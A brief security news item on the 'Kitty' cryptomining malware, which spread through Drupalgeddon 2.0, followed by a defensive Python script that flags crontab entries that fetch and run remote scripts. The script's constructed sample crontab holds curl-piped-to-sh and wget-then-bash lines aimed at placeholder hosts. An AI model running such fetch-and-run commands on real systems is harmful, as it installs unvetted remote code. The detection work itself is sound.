Crypto Me0wing Attacks: Kitty Cashes in on Monero

The internet has been the gateway to fame for many a cat, but the latest threat, the "Kitty" malware, has gained popularity for more nefarious reasons.
The attack is a variant that piggybacks on the exploit for Drupalgeddon 2.0, a critical remote code execution (RCE) vulnerability.

Researchers at Imperva reported a new technique in the crypto-jacking attack trend. “During the inspection of the attacks blocked by our systems, we came across the ‘Kitty’ malware, an advanced Monero cryptocurrency miner, utilizing a ‘webminerpool,’ an open source mining software for browsers,” Imperva wrote.

Once executed, the Kitty script uses a backdoor independent of the Drupal vulnerability to establish control. A time-based job scheduler periodically re-downloads and executes a Bash script from a remote host so that the attacker can quickly make updates and changes to the infected servers.
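
The scheduled re-download described above leaves a recognizable trace in crontab entries: a fetch tool, a remote URL and a shell interpreter in one command. The following detection sketch is an added example, not code from Imperva or the article; the host names, file paths and sample crontab are constructed and are not Kitty indicators.

```python
import re

URL = re.compile(r"(?:https?|ftp)://[^\s'\"|;&()<>]+")
# A fetch tool or shell interpreter used as a command word (optionally with a path).
FETCH = re.compile(r"(?:^|[\s|;&(])(?:/\S*/)?(?:curl|wget)(?=\s)")
SHELL = re.compile(r"(?:^|[\s|;&(])(?:/\S*/)?(?:ba|da|z|k)?sh(?=\s|$)")

def command_of(line):
    """Return the command part of a crontab line, or None for comments,
    blank lines, environment assignments and malformed entries."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
        return None
    if line.startswith("@"):              # @reboot, @hourly, ...
        fields, expected = line.split(None, 1), 2
    else:                                 # five schedule fields, then the command
        fields, expected = line.split(None, 5), 6
    # In system crontabs the user name stays at the front of the command;
    # that does not affect the matching below.
    return fields[-1] if len(fields) == expected else None

def find_fetch_and_run(crontab_text):
    """Return (line_number, urls) for entries that download from a remote
    host and invoke a shell interpreter in the same command."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        cmd = command_of(line)
        if cmd is None:
            continue
        urls = URL.findall(cmd)
        rest = URL.sub(" ", cmd)          # keep ".sh" inside URLs from matching SHELL
        if urls and FETCH.search(rest) and SHELL.search(rest):
            findings.append((lineno, urls))
    return findings

# Constructed sample crontab (hosts and paths are placeholders).
SAMPLE = """\
# constructed sample crontab
MAILTO=root
*/5 * * * * /usr/local/bin/backup.sh
0 3 * * * curl -fsS https://status.example.invalid/ping
* * * * * curl -fsSL http://updates.example.invalid/k.sh | sh
@hourly wget -q -O /tmp/.u http://updates.example.invalid/u && /bin/bash /tmp/.u
"""

if __name__ == "__main__":
    for lineno, urls in find_fetch_and_run(SAMPLE):
        print(f"line {lineno}: fetches and runs {', '.join(urls)}")
```

Run it over the output of `crontab -l` for each account and over the files in `/etc/cron.d`; a hit is a lead to review, since legitimate installers sometimes use the same pattern.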

Read entire article: Crypto-Me0wing, Not a Cute Kitty of the Internet | InfoSecurity
